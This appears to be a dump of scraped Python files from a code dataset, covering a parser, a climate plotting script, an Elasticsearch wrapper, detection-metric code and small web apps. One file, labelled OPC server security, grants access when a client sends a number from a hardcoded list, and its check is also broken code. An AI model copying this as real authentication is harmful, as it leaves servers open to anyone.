2.没有的默认设为2小时\n if string:\n str_list = re.findall(r\"\\d+\\.?\\d*\", string)\n count = 0\n for str in str_list:\n count += float(str)\n # print(count / len(str_list))\n return count / len(str_list)\n else:\n return 2\n\n\n\n","sub_path":"TravelPlace/Crawler/CrawlerPlayTime.py","file_name":"CrawlerPlayTime.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"429716188","text":"from tokenizer import TokenID\n\nsymbol_table = {}\n\nclass ASTBase:\n _fields = []\n def __init__(self, *args, **kwargs):\n for x, y in zip(self._fields, args):\n setattr(self, x, y)\n for k, v in kwargs.items():\n setattr(self, k, v)\n def __repr__(self):\n return \"%s[%s]\" % (self.__class__.__name__[:-3], \" \".join([\"%s=%r\" % (x, getattr(self, x)) for x in self._fields[:-2]]))\n @staticmethod\n def create_node(name, fields):\n return type(name + \"AST\", (ASTBase,), {\"_fields\": fields + [\"lineno\", \"column\"]})\n\nStringAST = ASTBase.create_node(\"String\", [\"v\"])\nNumberAST = ASTBase.create_node(\"Number\", [\"v\"])\nIdentifierAST = ASTBase.create_node(\"Identifier\", [\"id\"])\nBinaryOperatorAST = ASTBase.create_node(\"BinaryOperator\", [\"op\", \"left\", \"right\"])\nAssignAST = ASTBase.create_node(\"Assign\", [\"name\", \"value\"])\nUnaryOperatorAST = ASTBase.create_node(\"UnaryOperator\", [\"op\", \"operand\"])\nCallAST = ASTBase.create_node(\"Call\", [\"lhs\", \"args\"])\nLambdaAST = ASTBase.create_node(\"Lambda\", [\"args\", \"body\"])\nListAST = ASTBase.create_node(\"List\", [\"l\"])\nIndexAST = ASTBase.create_node(\"Index\", [\"lhs\", \"i\"])\n\ndef fsym(ast, sym, *args, **kwargs):\n t = ast(*args, **kwargs)\n t.lineno = sym.lineno\n t.column = sym.column\n return t\n\nclass symbol_base:\n id = TokenID.Unknow\n lbp = 0\n def __init__(self, value, lineno, column):\n self.value = value\n self.lineno = lineno\n self.column = column\n def nud(self):\n raise SyntaxError(\"Parsing error: Unknow literal %r at line %d, column %d\" % (self.value, self.lineno, self.column))\n def led(self, left):\n raise SyntaxError(\"Parsing error: Unknow operator %r at line %d, column %d\" % (self.value, self.lineno, self.column))\n\ndef get_symbol(tok):\n try:\n return symbol_table[tok.id]\n except KeyError:\n raise SyntaxError(\"Unknow token %r at line %d, column %d\" % (tok.value, tok.lineno, tok.column))\n\ndef symbol_(id, bp=0):\n try:\n s = symbol_table[id]\n except KeyError:\n class s(symbol_base):\n pass\n s.__name__ = \"symbol-\" + str(id)\n s.id = id\n s.lbp = bp\n symbol_table[id] = s\n else:\n s.lbp = max(bp, s.lbp)\n return s\n\ndef infix(id, bp):\n def led(self, left):\n return fsym(BinaryOperatorAST, self, self.id, left, expression(bp))\n symbol_(id, bp).led = led\ndef infix_r(id, bp):\n def led(self, left):\n return fsym(BinaryOperatorAST, self, self.id, left, expression(bp - 1))\n symbol_(id, bp).led = led\n\ndef prefix(id, bp):\n def nud(self):\n return fsym(UnaryOperatorAST, self, self.id, expression(bp))\n symbol_(id).nud = nud\n\ndef symbol(token):\n return get_symbol(token)(token.value, token.lineno, token.column)\n\ndef expect(id=None):\n global token\n if id and token.id != id:\n raise SyntaxError(\"Expected a %s, got a %s at line %d, column %d\" % (id, token.id, token.lineno, token.column))\n token = tokens_.pop(0)\n\ndef expression(rbp=0):\n global token\n t = token\n token = tokens_.pop(0)\n left = symbol(t).nud()\n while rbp < symbol(token).lbp:\n t = token\n token = tokens_.pop(0)\n left = symbol(t).led(left)\n return left\n\ndef parse(tokens):\n global token, tokens_\n tokens_ = tokens\n token = tokens.pop(0)\n ast = []\n while tokens:\n ast.append(expression())\n return ast\n\ndef bind(cls):\n def d(f):\n setattr(cls, f.__name__, f)\n return f\n return d\n\nsymbol_(TokenID.String).nud = lambda self: fsym(StringAST, self, self.value[1:-1])\n@bind(symbol_(TokenID.Number))\ndef nud(self):\n try:\n return fsym(NumberAST, self, int(self.value))\n except ValueError:\n return fsym(NumberAST, self, float(self.value))\nsymbol_(TokenID.Identifier).nud = lambda self: fsym(IdentifierAST, self, self.value)\n\n@bind(symbol_(TokenID.LParenthesis))\ndef nud(self):\n expr = expression()\n expect(TokenID.RParenthesis)\n return expr\n@bind(symbol_(TokenID.LParenthesis, 130))\ndef led(self, left):\n expr = expression()\n expect(TokenID.RParenthesis)\n return fsym(IndexAST, self, left, expr)\nsymbol_(TokenID.RParenthesis)\n\n@bind(symbol_(TokenID.LBracket, 150))\ndef led(self, left):\n l = []\n if token.id != TokenID.RBracket:\n while 1:\n l.append(expression())\n if token.id != TokenID.Comma:\n break\n expect(TokenID.Comma)\n expect(TokenID.RBracket)\n return fsym(CallAST, self, left, l)\n@bind(symbol_(TokenID.LBracket))\ndef nud(self):\n l = []\n if token.id != TokenID.RBracket:\n while 1:\n l.append(expression())\n if token.id != TokenID.Comma:\n break\n expect(TokenID.Comma)\n expect(TokenID.RBracket)\n return fsym(ListAST, self, l)\nsymbol_(TokenID.RBracket)\nsymbol_(TokenID.Comma)\n\n@bind(symbol_(TokenID.LCBracket))\ndef nud(self):\n args = []\n if token.id != TokenID.Pipe:\n while 1:\n args.append(token.value)\n expect()\n if token.id != TokenID.Comma:\n break\n expect(TokenID.Comma)\n expect(TokenID.Pipe)\n body = []\n while token.id != TokenID.RCBracket:\n body.append(expression())\n expect(TokenID.RCBracket)\n return fsym(LambdaAST, self, args, body)\nsymbol_(TokenID.RCBracket)\nsymbol_(TokenID.Pipe)\n\n@bind(symbol_(TokenID.OAssign, 10))\ndef led(self, left):\n return fsym(AssignAST, self, left, expression())\n\n@bind(symbol_(TokenID.ChainRight, 20))\ndef led(self, left):\n return fsym(CallAST, self, expression(20), [left])\n@bind(symbol_(TokenID.ChainLeft, 20))\ndef led(self, left):\n return fsym(CallAST, self, left, [expression(19)])\n\ninfix(TokenID.OAdd, 100); prefix(TokenID.OAdd, 120)\ninfix(TokenID.OSub, 100); prefix(TokenID.OSub, 120)\ninfix(TokenID.OMul, 110)\ninfix(TokenID.ODiv, 110)\ninfix(TokenID.OMod, 110)\ninfix_r(TokenID.OExp, 130)\n\ninfix(TokenID.OEquals, 50); infix(TokenID.ONonEquals, 50)\ninfix(TokenID.OLT, 50); infix(TokenID.OGT, 50)\ninfix(TokenID.OLE, 50); infix(TokenID.OGE, 50)\n\nsymbol_(TokenID.EOF)\n","sub_path":"ultimath/_parser.py","file_name":"_parser.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"48401427","text":"import numpy as np\nimport matplotlib.pyplot as plt; plt.close('all')\nfrom mpl_toolkits.basemap import Basemap\n\nimport oceanpy.varmeta\nfrom pygeo.grid import regular_grid\nfrom pyutils.stats import griddata_nn_delaunay\nimport phdpy.sverdrup\n\nfrom phdpy import settings\n\n\ndef plot_sverdrup_transport(dsid1, dsid2, region,\n tautimes=-1,\n savefig=False,\n full_colorscale=False):\n \"\"\"Plot Barotropic Stream Function Difference\"\"\"\n diffstr = '{}-{}int{}'.format(dsid1,dsid2,dsid1)\n\n fig = plt.figure()\n ax = fig.gca()\n\n vm = oceanpy.varmeta.VarMeta(\n long='Sverdrup transport difference in Sv',\n cmap=plt.cm.Spectral_r,\n levels=np.arange(-5.5,5.50001,1))\n\n # get data\n lon0_rewrap = settings.region_lon0[region]\n lon,lat,psi1 = phdpy.sverdrup.get_psi(settings.datafiles[dsid1],region,tautimes,lon0_rewrap=lon0_rewrap)\n psi2_int1 = phdpy.sverdrup.get_psi(settings.datafiles[dsid2],region,tautimes,lon0_rewrap=lon0_rewrap,\n interpolate_to_grid_from_file=settings.datafiles[dsid1])[-1]\n\n landmask = ~np.ma.getmask(psi1)\n\n # get map projection\n proj = 'robin'\n lon_0 = settings.region_centerlon[region]\n m = Basemap(ax=ax,projection=proj,lon_0=lon_0)\n\n # project grids\n x,y = m(lon,lat)\n\n # take difference\n dpsi = psi1 - psi2_int1\n\n if True:\n # interpolate to regular grid to plot\n x_gauss,y_gauss = m(*np.meshgrid(*regular_grid(0.25)))\n data = dpsi_gauss = griddata_nn_delaunay(x[landmask],y[landmask],dpsi[landmask],x_gauss,y_gauss)\n cnf = m.pcolormesh(x_gauss,y_gauss,dpsi_gauss,cmap=vm.cmap,zorder=1)\n else:\n data = dpsi\n cnf = m.pcolor(x[landmask],y[landmask],dpsi[landmask],tri=True,cmap=vm.cmap,zorder=1)\n\n if not full_colorscale: cnf.set_norm(vm.norm)\n\n cb = plt.colorbar(cnf,extend=('both' if not full_colorscale else 'neither'),orientation='horizontal')\n cb.set_label(vm.long)\n cb.ax.text(0,-1.5,'{:.2f}'.format(data.min()),ha='left',fontsize=8,transform=cb.ax.transAxes)\n cb.ax.text(1,-1.5,'{:.2f}'.format(data.max()),ha='right',fontsize=8,transform=cb.ax.transAxes)\n\n m.drawcoastlines(linewidth=0.5)\n m.fillcontinents('grey')\n m.drawmeridians(np.arange(-180,181,60),labels=[False,False,True,False],fontsize=8)\n m.drawparallels(np.arange(-80,81,20),labels=[False,True,False,False],fontsize=8)\n\n ax.text(0.95,0.05,diffstr,color='k',ha='left',va='bottom',transform=ax.transAxes)\n\n if savefig:\n figname = 'sverdrup_transport_difference_{}_{}'.format(region,diffstr)\n if full_colorscale: figname += '_fullscale'\n figname = ['sverdrup_transport', figname]\n settings.save_figure(figname, savepng=True, savepdf=False)\n else:\n plt.show()\n\n\nif __name__ == '__main__':\n \n defaults = dict( \n dsid1 = 'x3',\n dsid2 = 'x1',\n region = 'Atlantic',\n tautimes = -1,\n )\n\n import argparse\n parser = argparse.ArgumentParser(description=\"Plot Sverdrup transport computed from wind stress\")\n parser.add_argument('--dsid1',type=str,choices=settings.datafiles.keys(),help='first of dataset IDs to subtract')\n parser.add_argument('--dsid2',type=str,choices=settings.datafiles.keys(),help='second of dataset IDs to subtract')\n parser.add_argument('--region',type=str,help='region')\n parser.add_argument('--tautimes',type=int,choices=[-1,1],help='factor to multiply tau by')\n parser.add_argument('-s',dest='savefig',action='store_true',help='set this to save the figure')\n parser.add_argument('-f',dest='full_colorscale',action='store_true',help='use color scale that spans the full data range')\n\n parser.set_defaults(**defaults)\n args = parser.parse_args()\n \n plot_sverdrup_transport(**vars(args))\n","sub_path":"wind_driven_circulation/sverdrup_transport_interpolated_difference.py","file_name":"sverdrup_transport_interpolated_difference.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"115496664","text":"from django.conf import settings\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.client.utils import _make_path\nfrom elasticsearch.exceptions import NotFoundError, RequestError, ConnectionError\n\nes = Elasticsearch(settings.HOOVER_ELASTICSEARCH_URL)\nDOCTYPE = 'doc'\n\nclass SearchError(Exception):\n def __init__(self, reason):\n self.reason = reason\n\ndef create_index(collection_id, name):\n es.indices.create(index=_index_name(collection_id))\n\ndef _index_name(collection_id):\n from .models import Collection\n return Collection.objects.get(id=collection_id).index\n\ndef _index_id(index):\n from .models import Collection\n return Collection.objects.get(index=index).id\n\ndef index(collection_id, doc):\n resp = es.index(\n index=_index_name(collection_id),\n doc_type=DOCTYPE,\n id=doc['id'],\n body=doc,\n )\n\n\ndef exists(collection_id, doc_id):\n path = _make_path(_index_name(collection_id), DOCTYPE, doc_id)\n (status, _) = es.transport.perform_request('HEAD', path, {'ignore': 404})\n return status == 200\n\n\ndef get(collection_id, doc_id):\n return es.get(\n index=_index_name(collection_id),\n doc_type=DOCTYPE,\n id=doc_id,\n )\n\n\ndef search(query, fields, highlight, collections, from_, size, sort, aggs):\n from .models import Collection\n indices = ','.join(\n c.index for c in\n Collection.objects.filter(name__in=collections)\n )\n\n if not indices:\n # if index='', elasticsearch will search in all indices, so we make\n # sure to return an empty result set\n empty_query = {'query': {'bool': {'must_not': {'match_all': {}}}}}\n return (es.search(body=empty_query), {})\n\n body = {\n 'from': from_,\n 'size': size,\n 'query': query,\n 'fields': fields,\n 'sort': sort,\n 'aggs': dict(aggs, **{\n 'count_by_index': {\n 'terms': {\n 'field': '_index',\n },\n },\n }),\n }\n\n if highlight:\n body['highlight'] = highlight\n\n try:\n rv = es.search(\n index=indices,\n ignore_unavailable=True,\n body=body,\n request_timeout=60,\n )\n except ConnectionError:\n raise SearchError('Could not connect to Elasticsearch.')\n except RequestError as e:\n def extract_info(ex):\n reason = 'reason unknown'\n try:\n if ex.info:\n reason = ex.info['error']['root_cause'][0]['reason']\n except LookupError:\n pass\n return reason\n raise SearchError('Elasticsearch failed: ' + extract_info(e))\n\n count_by_index = {\n _index_id(b['key']): b['doc_count']\n for b in rv['aggregations']['count_by_index']['buckets']\n }\n return (rv, count_by_index)\n\n\ndef delete_index(collection_id, ok_missing=False):\n es.indices.delete(\n index=_index_name(collection_id),\n ignore=[404] if ok_missing else [],\n )\n\n\ndef delete_all():\n for index in es.indices.get(index='*'):\n if index.startswith(settings.ELASTICSEARCH_INDEX_PREFIX):\n es.indices.delete(index=index)\n\n\ndef refresh():\n es.indices.refresh()\n\n\ndef count(collection_id):\n try:\n return es.count(index=_index_name(collection_id))['count']\n except NotFoundError:\n return None\n\n\ndef aliases(collection_id):\n name = _index_name(collection_id)\n alias_map = es.indices.get_aliases(index=name)\n return set(alias_map.get(name, {}).get('aliases', {}))\n\n\ndef create_alias(collection_id, name):\n try:\n es.indices.put_alias(index=_index_name(collection_id), name=name)\n except NotFoundError:\n es.indices.create(index=_index_name(collection_id))\n es.indices.put_alias(index=_index_name(collection_id), name=name)\n\n\ndef delete_aliases(collection_id):\n es.indices.delete_alias(index=_index_name(collection_id), name='*')\n\n\ndef set_mapping(collection_id, properties):\n es.indices.put_mapping(\n index=_index_name(collection_id),\n doc_type=DOCTYPE,\n body={'properties': properties},\n )\n\n\ndef status():\n return {\n index: {\n 'aliases': list(amap['aliases']),\n 'documents': es.count(index=index)['count'],\n }\n for index, amap in es.indices.get_aliases().items()\n }\n\n\ndef list_indices():\n for index in es.indices.get(index='*'):\n if index.startswith(settings.ELASTICSEARCH_INDEX_PREFIX):\n suffix = index[len(settings.ELASTICSEARCH_INDEX_PREFIX):]\n try:\n collection_id = int(suffix)\n except ValueError:\n continue\n yield collection_id\n","sub_path":"hoover/search/es.py","file_name":"es.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"595660223","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n\nimport socket\nimport bcrypt\nimport json\nimport cv2\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\nimport numpy as np\nfrom PIL import Image\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.applications import imagenet_utils\n\n\n# In[ ]:\n\n\n\nclass OPC_SERVER_SECURITY:\n def __init__(self):\n self.server_socket = socket.socket()\n self.salt = bcrypt.gensalt()\n\n def init_opc_server_security(self, ip):\n self.server_socket.bind((ip, 5000))\n self.server_socket.listen(1)\n \n def client_authentication(self):\n is_client_authenticated = False\n print(\"Waiting for clients....\")\n\n conn, address = self.server_socket.accept()\n while True:\n #face=recognizer(img)\n recvd_name=conn.recv(1024).decode()\n recvd_name=float(recvd_name)\n registered_users=[0,1,2,3]\n if any(i in recvd_name for i in registered_users):\n conn.send(\"Success\".encode())\n is_client_authenticated = True\n break\n else:\n conn.send(\"Failure\".encode())\n is_client_authenticated = False\n break\n \n if is_client_authenticated:\n print(\"Server access granted\")\n return True\n else:\n print(\"Server access denied\")\n return False\n \n\n","sub_path":"Analytic Process Control/integration/server_security.py","file_name":"server_security.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"456091258","text":"# https://leetcode-cn.com/problems/add-binary/\n\n\nclass Solution:\n def addBinary(self, a: str, b: str) -> str:\n a, b = list(map(int, a)), list(map(int, b))\n a.reverse()\n b.reverse()\n if len(a) < len(b):\n a, b = b, a\n carry = 0\n for i in range(len(b)):\n print(a[i], b[i], carry)\n digit = (a[i] + b[i] + carry) % 2\n carry = (a[i] + b[i] + carry) // 2\n a[i] = digit\n for i in range(len(b), len(a)):\n print(a[i], carry)\n digit = (a[i] + carry) % 2\n carry = (a[i] + carry) // 2\n a[i] = digit\n a.reverse()\n if carry == 1:\n a = [1] + a\n return ''.join([str(i) for i in a])\n\n\n# 10101\na1 = '1010'\nb1 = '1011'\n\n# 100\na2 = '11'\nb2 = '1'\n\n# 110010\na3 = \"110010\"\nb3 = \"100\"\n\nprint(Solution().addBinary(a2, b2))\n","sub_path":"067-1-Add Binary.py","file_name":"067-1-Add Binary.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"536928806","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom .forms import DynamicForm\nfrom django import forms\nfrom .models import JSONBmodel\nimport json\n\n\ndef show_form(request):\n if request.method == \"POST\":\n if request.POST.get(\"add_button\"):\n form = DynamicForm(request.POST)\n form.fields[\"Field\" + str(len(request.POST) - 2)] = forms.CharField(max_length=255)\n elif request.POST.get('submit_button'):\n form = DynamicForm(request.POST)\n if form.is_valid():\n saved_object = JSONBmodel()\n res = {}\n for field in form.cleaned_data.keys():\n res[field] = form.cleaned_data[field]\n saved_object.data = json.dumps(res)\n saved_object.save()\n return HttpResponseRedirect('/done/')\n else:\n form = DynamicForm(request.POST)\n else:\n form = DynamicForm()\n return render(request, 'name.html', {'form': form})\n\n\ndef done(request):\n return HttpResponse('Data has been saved')\n","sub_path":"testapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"579601968","text":"from multiprocessing import Pool\n\nimport numpy as np\nfrom mmcv.utils import print_log\n\nfrom mmdet.core.evaluation.bbox_overlaps import bbox_overlaps\nfrom mmdet.core.evaluation.mean_ap import get_cls_results\n\n\ndef calc_tpfpfn(det_bboxes, gt_bboxes, iou_thr=0.5):\n \"\"\"Check if detected bboxes are true positive or false positive and if gt bboxes are false negative.\n\n Args:\n det_bboxes (ndarray): Detected bboxes of this image, of shape (m, 5).\n gt_bboxes (ndarray): GT bboxes of this image, of shape (n, 4).\n iou_thr (float): IoU threshold to be considered as matched.\n Default: 0.5.\n\n Returns:\n float: (tp, fp, fn).\n \"\"\"\n num_dets = det_bboxes.shape[0]\n num_gts = gt_bboxes.shape[0]\n tp = 0\n fp = 0\n\n # if there is no gt bboxes in this image, then all det bboxes\n # within area range are false positives\n if num_gts == 0:\n fp = num_dets\n return tp, fp, 0\n\n ious: np.ndarray = bbox_overlaps(det_bboxes, gt_bboxes)\n # sort all dets in descending order by scores\n sort_inds = np.argsort(-det_bboxes[:, -1])\n gt_covered = np.zeros(num_gts, dtype=bool)\n for i in sort_inds:\n uncovered_ious = ious[i, gt_covered == 0]\n if len(uncovered_ious):\n iou_argmax = uncovered_ious.argmax()\n iou_max = uncovered_ious[iou_argmax]\n if iou_max > iou_thr:\n gt_covered[[x[iou_argmax] for x in np.where(gt_covered == 0)]] = True\n tp += 1\n else:\n fp += 1\n else:\n fp += 1\n fn = (gt_covered == 0).sum()\n return tp, fp, fn\n\n\ndef kaggle_map(\n det_results, annotations, iou_thrs=(0.5, 0.55, 0.6, 0.65, 0.7, 0.75), logger=None, n_jobs=4, by_sample=False\n):\n \"\"\"Evaluate kaggle mAP of a dataset.\n\n Args:\n det_results (list[list]): [[cls1_det, cls2_det, ...], ...].\n The outer list indicates images, and the inner list indicates\n per-class detected bboxes.\n annotations (list[dict]): Ground truth annotations where each item of\n the list indicates an image. Keys of annotations are:\n\n - `bboxes`: numpy array of shape (n, 4)\n - `labels`: numpy array of shape (n, )\n - `bboxes_ignore` (optional): numpy array of shape (k, 4)\n - `labels_ignore` (optional): numpy array of shape (k, )\n iou_thrs (list): IoU thresholds to be considered as matched.\n Default: (0.5, 0.55, 0.6, 0.65, 0.7, 0.75).\n logger (logging.Logger | str | None): The way to print the mAP\n summary. See `mmdet.utils.print_log()` for details. Default: None.\n n_jobs (int): Processes used for computing TP, FP and FN.\n Default: 4.\n by_sample (bool): Return AP by sample.\n\n Returns:\n tuple: (mAP, [dict, dict, ...])\n \"\"\"\n eps=1e-9\n assert len(det_results) == len(annotations)\n\n num_imgs = len(det_results)\n num_classes = len(det_results[0]) # positive class num\n\n pool = Pool(n_jobs)\n eval_results = []\n for i in range(num_classes):\n # get gt and det bboxes of this class\n cls_dets, cls_gts, _ = get_cls_results(det_results, annotations, i)\n # compute tp and fp for each image with multiple processes\n aps_by_thrs = []\n p_by_thrs=[]\n r_by_thrs=[]\n aps_by_sample = np.zeros(num_imgs)\n for iou_thr in iou_thrs:\n tpfpfn = pool.starmap(calc_tpfpfn, zip(cls_dets, cls_gts, [iou_thr for _ in range(num_imgs)]))\n iou_thr_aps = np.array([tp / (tp + fp + fn+eps) for tp, fp, fn in tpfpfn])\n iou_thr_p=np.array([tp / (tp + fp+eps) for tp, fp, fn in tpfpfn])\n iou_thr_r=np.array([tp / (tp + fn+eps) for tp, fp, fn in tpfpfn])\n if by_sample:\n aps_by_sample += iou_thr_aps\n aps_by_thrs.append(np.mean(iou_thr_aps))\n p_by_thrs.append(np.mean(iou_thr_p))\n r_by_thrs.append(np.mean(iou_thr_r))\n eval_results.append(\n {\n \"num_gts\": len(cls_gts),\n \"num_dets\": len(cls_dets),\n \"ap\": np.mean(aps_by_thrs),\n 'p':np.mean(p_by_thrs),\n 'r':np.mean(r_by_thrs),\n \"ap_by_sample\": None if not by_sample else aps_by_sample / len(iou_thrs),\n }\n )\n pool.close()\n\n aps = []\n ps=[]\n rs=[]\n for cls_result in eval_results:\n if cls_result[\"num_gts\"] > 0:\n aps.append(cls_result[\"ap\"])\n ps.append(cls_result[\"p\"])\n rs.append(cls_result[\"r\"])\n mean_ap = np.array(aps).mean().item() if aps else 0.0\n mean_p = np.array(ps).mean().item() if ps else 0.0\n mean_r = np.array(rs).mean().item() if rs else 0.0\n\n print_log(f\"\\nKaggle mAP: {mean_ap},P:{mean_p},R:{mean_r}\", logger=logger)\n return mean_ap,mean_p,mean_r,eval_results\n\nimport torch\n\ndef box_iou(box1, box2):\n # https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py\n \"\"\"\n Return intersection-over-union (Jaccard index) of boxes.\n Both sets of boxes are expected to be in (x1, y1, x2, y2) format.\n Arguments:\n box1 (Tensor[N, 4])\n box2 (Tensor[M, 4])\n Returns:\n iou (Tensor[N, M]): the NxM matrix containing the pairwise\n IoU values for every element in boxes1 and boxes2\n \"\"\"\n\n def box_area(box):\n # box = 4xn\n return (box[2] - box[0]) * (box[3] - box[1])\n\n area1 = box_area(box1.t())\n area2 = box_area(box2.t())\n\n # inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2)\n inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)\n return inter / (area1[:, None] + area2 - inter) # iou = inter / (area1 + area2 - inter)\n\ndef compute_ap(recall, precision):\n \"\"\" Compute the average precision, given the recall and precision curves.\n Source: https://github.com/rbgirshick/py-faster-rcnn.\n # Arguments\n recall: The recall curve (list).\n precision: The precision curve (list).\n # Returns\n The average precision as computed in py-faster-rcnn.\n \"\"\"\n\n # Append sentinel values to beginning and end\n mrec = np.concatenate(([0.], recall, [min(recall[-1] + 1E-3, 1.)]))\n mpre = np.concatenate(([0.], precision, [0.]))\n\n # Compute the precision envelope\n mpre = np.flip(np.maximum.accumulate(np.flip(mpre)))\n\n # Integrate area under curve\n method = 'interp' # methods: 'continuous', 'interp'\n if method == 'interp':\n x = np.linspace(0, 1, 101) # 101-point interp (COCO)\n ap = np.trapz(np.interp(x, mrec, mpre), x) # integrate\n else: # 'continuous'\n i = np.where(mrec[1:] != mrec[:-1])[0] # points where x axis (recall) changes\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1]) # area under curve\n\n return ap\n\n\ndef ap_per_class(tp, conf, pred_cls, target_cls):\n \"\"\" Compute the average precision, given the recall and precision curves.\n Source: https://github.com/rafaelpadilla/Object-Detection-Metrics.\n # Arguments\n tp: True positives (nparray, nx1 or nx10).\n conf: Objectness value from 0-1 (nparray).\n pred_cls: Predicted object classes (nparray).\n target_cls: True object classes (nparray).\n # Returns\n The average precision as computed in py-faster-rcnn.\n \"\"\"\n\n # Sort by objectness\n i = np.argsort(-conf)\n tp, conf, pred_cls = tp[i], conf[i], pred_cls[i]\n\n # Find unique classes\n unique_classes = np.unique(target_cls)\n\n # Create Precision-Recall curve and compute AP for each class\n pr_score = 0.1 # score to evaluate P and R https://github.com/ultralytics/yolov3/issues/898\n s = [unique_classes.shape[0], tp.shape[1]] # number class, number iou thresholds (i.e. 10 for mAP0.5...0.95)\n ap, p, r = np.zeros(s), np.zeros(s), np.zeros(s)\n for ci, c in enumerate(unique_classes):\n i = pred_cls == c\n n_gt = (target_cls == c).sum() # Number of ground truth objects\n n_p = i.sum() # Number of predicted objects\n\n if n_p == 0 or n_gt == 0:\n continue\n else:\n # Accumulate FPs and TPs\n fpc = (1 - tp[i]).cumsum(0)\n tpc = tp[i].cumsum(0)\n\n # Recall\n recall = tpc / (n_gt + 1e-16) # recall curve\n r[ci] = np.interp(-pr_score, -conf[i], recall[:, 0]) # r at pr_score, negative x, xp because xp decreases\n\n # Precision\n precision = tpc / (tpc + fpc) # precision curve\n p[ci] = np.interp(-pr_score, -conf[i], precision[:, 0]) # p at pr_score\n\n # AP from recall-precision curve\n for j in range(tp.shape[1]):\n ap[ci, j] = compute_ap(recall[:, j], precision[:, j])\n\n # Plot\n # fig, ax = plt.subplots(1, 1, figsize=(5, 5))\n # ax.plot(recall, precision)\n # ax.set_xlabel('Recall')\n # ax.set_ylabel('Precision')\n # ax.set_xlim(0, 1.01)\n # ax.set_ylim(0, 1.01)\n # fig.tight_layout()\n # fig.savefig('PR_curve.png', dpi=300)\n\n # Compute F1 score (harmonic mean of precision and recall)\n f1 = 2 * p * r / (p + r + 1e-16)\n\n return p, r, ap, f1, unique_classes.astype('int32')\n\n\n\ndef kaggle_map_yolov3(\n det_results, annotations, iou_thrs=(0.5, 0.55, 0.6, 0.65, 0.7, 0.75), logger=None, n_jobs=4, by_sample=False\n):\n iouv = torch.tensor(iou_thrs)\n niou = len(iouv)\n seen = 0\n p, r, f1, mp, mr, map, mf1, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.\n jdict, stats, ap, ap_class = [], [], [], []\n for si, pred in enumerate(det_results):\n pred = torch.from_numpy(pred[0]) if pred else None\n tcls = torch.from_numpy(annotations[si]['labels'])\n tbox = torch.from_numpy(annotations[si]['bboxes'])\n nl = len(tcls)\n seen += 1\n\n if pred is None:\n if nl:\n stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))\n continue\n\n # Append to text file\n # with open('test.txt', 'a') as file:\n # [file.write('%11.5g' * 7 % tuple(x) + '\\n') for x in pred]\n\n # Assign all predictions as incorrect\n correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)\n if nl:\n detected = [] # target indices\n\n # Per target class\n for cls in np.unique(tcls):\n ti = (cls == tcls).nonzero().view(-1) # prediction indices\n pi = torch.tensor([i for i in range(len(pred))]) # target indices\n\n # Search for detections\n if pi.shape[0]:\n # Prediction to target ious\n ious, i = box_iou(pred[pi, :4], tbox[ti]).max(1) # best ious, indices\n\n # Append detections\n for j in (ious > iouv[0]).nonzero():\n d = ti[i[j]] # detected target\n if d not in detected:\n detected.append(d)\n correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn\n if len(detected) == nl: # all targets already located in image\n break\n\n # Append statistics (correct, conf, pcls, tcls)\n pcls = torch.zeros(pred.shape[0])\n stats.append((correct, pred[:, 4], pcls, tcls))\n\n stats = [np.concatenate(x, 0) for x in zip(*stats)]\n if len(stats):\n p, r, ap, f1, ap_class = ap_per_class(*stats)\n if niou > 1:\n p, r, ap, f1 = p[:, 0], r[:, 0], ap.mean(1), f1.mean(1) # [P, R, AP@0.5:0.95, AP@0.5]\n mp, mr, map, mf1 = p.mean(), r.mean(), ap.mean(), f1.mean()\n nt = np.bincount(stats[3].astype(np.int64), minlength=1) # number of targets per class\n else:\n nt = torch.zeros(1)\n return mp, mr, map, mf1\n","sub_path":"gwd/datasets/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":11948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"255760820","text":"\"\"\"users routes\"\"\"\nfrom flask import current_app as app, jsonify, request\nfrom models import Games, BaseObject, db\nfrom collections import OrderedDict\nimport numpy as np\nimport json\nimport glob\n\n\n@app.route('/games//', methods=['GET'])\n\ndef get_games(game_id,block_id):\n\n query = Games.query.filter(Games.game_id==game_id, Games.block_number==block_id)\n if query != None:\n print('Exists')\n \n block = query.first_or_404()\n\n # format the query into a dictionnary first:\n\t\n result = {}\n arr_block = block.get_block_number()[0].replace(' ',' ').split(' ')\n result['block_number'] = arr_block[0]\n\n arr_block_feedback = block.get_block_feedback()[0].replace(' ',' ').split(' ')\n result['block_feedback'] = arr_block_feedback[0]\n \n symbols = {}\n symbols[str(0)] = str(block.get_symbol_1())\n symbols[str(1)] = str(block.get_symbol_2())\n symbols[str(2)] = str(block.get_symbol_3())\n 